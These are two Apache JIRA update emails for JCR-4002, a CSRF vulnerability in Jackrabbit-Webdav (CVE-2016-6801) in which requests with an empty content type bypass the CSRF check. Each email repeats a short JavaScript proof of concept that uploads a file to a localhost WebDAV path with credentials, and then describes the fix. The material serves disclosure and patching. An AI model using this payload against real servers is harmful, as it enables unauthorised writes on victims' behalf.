[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Julian Reschke updated JCR-4002: Fix Version/s: 2.14 > CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801) > -- > > Key: JCR-4002 > URL: https://issues.apache.org/jira/browse/JCR-4002 > Project: Jackrabbit Content Repository > Issue Type: Bug > Components: jackrabbit-webdav >Affects Versions: 2.13.1 >Reporter: Dominique Jäggi >Assignee: Dominique Jäggi >Priority: Blocker > Labels: csrf, security, webdav > Fix For: 2.13.2, 2.14 > > Attachments: CVE-2016-6801.txt, > JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch > > > As per [0] the CSRF content-type check does not include a null request > content type. This can be exploited to create a resource via CSRF like so: > {code} > > > > function submitRequest() > { > var xhr = new XMLHttpRequest(); > xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true); > xhr.withCredentials = true; > var body = "This file has been uploaded via CSRF.=\r\n"; > var aBody = new Uint8Array(body.length); > for (var i = 0; i < aBody.length; i++) > aBody[i] = body.charCodeAt(i); > xhr.send(new Blob([aBody])); > } > > >/> > > > > {code} > I will mitigate this particular issue by including a null content type in the > list of rejected content types. > [0] https://github.com/cryptomator/cryptomator/issues/319 -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Julian Reschke updated JCR-4002: Summary: CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801) (was: CSRF in Jackrabbit-Webdav using empty content-type) > CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801) > -- > > Key: JCR-4002 > URL: https://issues.apache.org/jira/browse/JCR-4002 > Project: Jackrabbit Content Repository > Issue Type: Bug > Components: jackrabbit-webdav >Affects Versions: 2.13.1 >Reporter: Dominique Jäggi >Assignee: Dominique Jäggi >Priority: Blocker > Labels: csrf, security, webdav > Fix For: 2.13.2 > > Attachments: CVE-2016-6801.txt, > JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch > > > As per [0] the CSRF content-type check does not include a null request > content type. This can be exploited to create a resource via CSRF like so: > {code} > > > > function submitRequest() > { > var xhr = new XMLHttpRequest(); > xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true); > xhr.withCredentials = true; > var body = "This file has been uploaded via CSRF.=\r\n"; > var aBody = new Uint8Array(body.length); > for (var i = 0; i < aBody.length; i++) > aBody[i] = body.charCodeAt(i); > xhr.send(new Blob([aBody])); > } > > >/> > > > > {code} > I will mitigate this particular issue by including a null content type in the > list of rejected content types. > [0] https://github.com/cryptomator/cryptomator/issues/319 -- This message was sent by Atlassian JIRA (v6.3.4#6332)